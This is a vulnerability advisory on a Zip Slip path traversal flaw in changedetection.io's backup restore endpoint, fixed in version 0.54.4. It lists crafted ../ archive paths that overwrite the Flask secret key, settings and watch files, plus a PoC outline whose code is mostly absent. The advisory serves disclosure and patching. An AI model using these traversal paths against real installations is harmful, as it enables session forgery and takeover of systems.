Описание
changedetection.io has Zip Slip vulnerability in the backup restore functionality
Summary
A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives.
Details
A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. The application uses zipfile.extractall() without validating entry paths, allowing ../ sequences to escape the extraction directory.
Vulnerable Code (lines 50-53):
The extractall() function preserves the relative paths stored within the ZIP archive. When a malicious ZIP contains entries with ../ path traversal sequences, these files are extracted outside the intended directory.
| Path in ZIP | Target File | Impact |
|---|---|---|
| ../secret.txt | Flask secret key | Session forgery, auth bypass |
| ../changedetection.json | App settings | Disable password, inject backdoor |
| ../url-watches.json | Watch index | Inject malicious watches |
| ../{uuid}/watch.json | Watch config | Modify any watch |
Attacker uploads ZIP via the backup restore functionality at /backups/restore Application extracts files without validation, writing attacker content to sensitive locations
PoC
Step 1: Create Malicious ZIP
Step 2: Upload via Restore Endpoint
###Step 3: Verify Path Traversal
Check if watch escaped to /datastore/
###ls -la /datastore/
Look for: pwned-uuid-1234/
Verify in UI
curl "http://target:5000/" | grep "ZIPSLIP"
Пакеты
changedetection.io
<= 0.54.3
0.54.4
Связанные уязвимости
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, a Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. This issue has been patched in version 0.54.4.